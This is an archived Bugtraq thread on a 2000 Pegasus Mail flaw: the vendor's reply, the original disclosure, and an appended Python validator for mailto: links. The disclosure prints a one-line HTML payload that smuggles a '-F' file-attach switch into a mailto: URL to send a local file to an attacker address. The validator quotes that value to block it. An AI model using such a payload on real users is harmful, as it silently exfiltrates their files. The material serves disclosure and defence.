Bugtraq mailing list archives

Re: Pegasus mail file reading vulnerability (fwd)


From: Richard Stevenson <richard.stevenson () TEAM XTRA CO NZ>
Date: Wed, 4 Oct 2000 14:00:15 +1300

Hi Aleph1

My apologies for this... I'm not subscribed to Bugtraq at present,
but this is Pegasus Mail Central's response to the threat publicised on
BugTraq recently, so it'll have to go through the moderator.

Regards

Richard



--
Richard Stevenson                       |    Help Microsoft stamp out software
Systems Support Specialist              |    piracy: install Linux today!
richard.stevenson () team xtra co nz       |
Phone +64 9 355 5231                    |    <http://www.linux.org>
Mobile +64 25 2903101                   |



---------- Forwarded message ----------
From: David Harris <David.Harris () pmail gen nz>
To: Imran Ghory <ImranG () BTINTERNET COM>
Date: Wed, 4 Oct 2000 13:54:02 +1300
X-Mailer: Pegasus Mail for Win32 (v4.0, pre-alpha)
Cc: Mark Borrie <mark () gandalf otago ac nz>, Richard.Stevenson () team xtra co nz
Subject: Re: Pegasus mail file reading vulnerability

Mr Ghory has posted an announcement of a potential security hole in
Pegasus Mail, the text for which appears at the end of this message.

Well, I'm the vendor. It's a shame Mr Ghory didn't give us a chance to
prepare for the wave of panic, dismay and inundation of mail that a
posting like this always provokes, but never mind.

Firstly, I'll do the responsible thing and admit that as far as I can tell,
this exploit is feasible. It takes advantage of the fact that Pegasus Mail
has a commandline interface that can be invoked from within a web
browser. Please note that the URL as presented in the report will not
work correctly on the majority of systems - Pegasus Mail requires the
formal RFC1738 syntax for URLs containing spaces. But if properly
represented, it could produce the described effect.

My assessment of the risk involved in this exploit is that it is moderate
at worst. The hacker would need to have exact knowledge of the layout
of the victim's system, and would need to find some way of enticing the
victim to read a page containing the specific link needed to activate the
exploit. Furthermore, even if Pegasus Mail is running, there will almost
always be telltale indications to the user that something has
happened. It is worth stressing that this vulnerability exists only in the
case of links activated from a web browser - Pegasus Mail already
deals with internal mail-based linkages like this.

It is my belief that this exploit may have counterparts in other mail
programs. I suspect that any mail program that has a method for being
invoked from a browser may potentially have a vulnerability along these
lines. I say this not to produce FUD, but in the hope that other
developers will examine their code and satisfy themselves that they are
not at risk from this kind of exploit.

We currently have a replacement component in development which
handles the link between the browser and Pegasus Mail: this
component was developed primarily to deal with other non-security-
related problems, but I will add some code to it to detect links that
send files (something that should never happen in normal use) and
release it publicly as soon as is humanly possible.

I am not subscribed to BugTraq (I probably should be) - so I am asking
my spokesman on the list, Richard Stevenson, to post this reaction to
the list on my behalf (thanks Richard!). I would thank Mr Ghory for
bringing this to our attention, but he hasn't done so yet.

Cheers!

-- David --
Author/Owner, Pegasus Mail System.

------------- Original report follows -------------------------

SUMMARY

The default setup of Pegasus Mail contains a remotely exploitable
security hole that allows a remote website to gain copies of files on the
users hard drive.

DETAILS

Version tested: Pegasus Mail v3.12c with IE5.0

When the webpage containing the exploit code is viewed using IE5,
Pegasus mail will automatically create a message which has a copy
of the file "c:\test.txt" and is addressed to "hacker () hakersite com" and
queues it ready to be sent without any further user intervention.

If instead of "hacker () hakersite com" we have a local user,
"hacker", the message won't be queued but just sent immediately.

Exploit code:

<img src="mailto:hacker () hakersite com -F c:\test.txt">

Temporary Fix:

1) Don't run Pegasus Mail at the same time as a web browser

This is not a complete solution as Pegasus Mail will load up if the
exploit code is run, but this at least will be more noticeable to the user.

Vendor:

As I earlier posted a message to vuln-dev giving the basics of this
exploit without realizing the consequences (at that stage the user
had to click on a link for the exploit to come into play), I have decided
to publish the full exploit before contacting the vendor.


------------------ David Harris -+- Pegasus Mail ----------------------
  Box 5451, Dunedin, New Zealand | e-mail: David.Harris () pmail gen nz
           Phone: +64 3 453-6880 | Fax: +64 3 453-6612

Thought for the day:
    Book (n): a utensil used to pass time while waiting
    for the TV repairman.
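
The check David Harris says he will add to the browser-to-mail-client
component, shown as an added example (this is not Pegasus Mail code and
not code from either poster). The root cause in the report is that the
browser hands the raw mailto: URL to the mail client's command-line
interface, where a trailing " -F c:\test.txt" is read as a switch that
attaches a file. The validator below (hypothetical function names,
written in Python for illustration) parses the link into structured
fields, decodes RFC 1738 percent-escapes before inspecting them, and
accepts only recipients and a small set of headers, so a switch or a
file path can never reach the client's argument parser.

```python
import re
from urllib.parse import parse_qs, unquote

# Headers a mailto: link may set; everything else (e.g. anything that
# would attach a file) is rejected outright.
ALLOWED_HEADERS = {"subject", "body", "cc"}

# Whitelist for one recipient: must start with an alphanumeric, so a
# leading "-" or "/" (a switch) can never pass; no spaces, colons or
# backslashes, so "-F c:\test.txt" and "c:\test.txt" can never pass.
# A bare local user name ("hacker") without a domain is still allowed.
ADDRESS_RE = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._%+-]*(@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*)?$"
)
CONTROL_RE = re.compile(r"[\r\n\x00]")  # header-injection characters


class UnsafeMailtoLink(ValueError):
    """Raised for any mailto: link that must not reach the mail client."""


def parse_mailto(url):
    """Return {"to": [...], "headers": {...}} or raise UnsafeMailtoLink."""
    if not url.lower().startswith("mailto:"):
        raise UnsafeMailtoLink("not a mailto: URL")
    addr_part, _, query = url[len("mailto:"):].partition("?")
    # Decode first, so "%20-F%20c:%5Ctest.txt" is judged like the plain form.
    addr_part = unquote(addr_part)
    recipients = [a.strip() for a in addr_part.split(",") if a.strip()]
    if not recipients:
        raise UnsafeMailtoLink("no recipient")
    for r in recipients:
        if not ADDRESS_RE.match(r):
            raise UnsafeMailtoLink("recipient looks like a switch or path: %r" % r)
    headers = {}
    for key, values in parse_qs(query, keep_blank_values=True).items():
        key = key.lower()
        if key not in ALLOWED_HEADERS:
            raise UnsafeMailtoLink("header %r not allowed" % key)
        if CONTROL_RE.search(values[0]):
            raise UnsafeMailtoLink("control characters in header %r" % key)
        headers[key] = values[0]
    return {"to": recipients, "headers": headers}


def is_safe_mailto(url):
    """True only if the link parses into plain recipients and headers."""
    try:
        parse_mailto(url)
        return True
    except UnsafeMailtoLink:
        return False
```

The fields returned must then be passed to the mail client as discrete
arguments or through a structured API, never re-joined into a command
string, since that is precisely where the "-F" switch is injected.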

